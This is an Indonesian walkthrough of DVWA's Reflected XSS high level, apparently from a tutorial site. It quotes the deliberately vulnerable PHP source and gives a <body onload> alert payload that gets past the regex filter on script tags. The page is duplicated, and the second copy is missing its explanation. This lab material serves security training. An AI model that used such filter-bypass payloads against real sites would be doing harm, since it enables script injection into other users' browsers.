High

XSS (Reflected) level High on DVWA

Di bawah ini adalah source-code dari XSS (Reflected) level medium di DVWA.

vulnerabilities/xss_r/source/high.php
<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

Mencari Informasi

Pada source code di atas terlihat bahwa pattern "<s*c*r*i*p*t" tidak diizinkan. Tetapi seperti pada level sebelumnya kita tidak menggunakan tag <script>. Sehingga kita masih bisa menggunakan payload yang sama seperti pada level sebelumnya.

Melakukan Serangan

Oke langsung saja kita gunakan payload sebelumnya.

<body onload="alert('Hacked')">

Yup! Berhasil lagi. Mudah bukan?😁

Tetap semangat! Happy Hacking! 🍻

PreviousMedium NextStored

Last updated 3 years ago

Was this helpful?

High

XSS (Reflected) level High on DVWA

Di bawah ini adalah source-code dari XSS (Reflected) level medium di DVWA.

vulnerabilities/xss_r/source/high.php
<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

Mencari Informasi

Melakukan Serangan

Oke langsung saja kita gunakan payload sebelumnya.

<body onload="alert('Hacked')">

Yup! Berhasil lagi. Mudah bukan?😁

Tetap semangat! Happy Hacking! 🍻

PreviousMedium NextStored

Last updated 3 years ago

Was this helpful?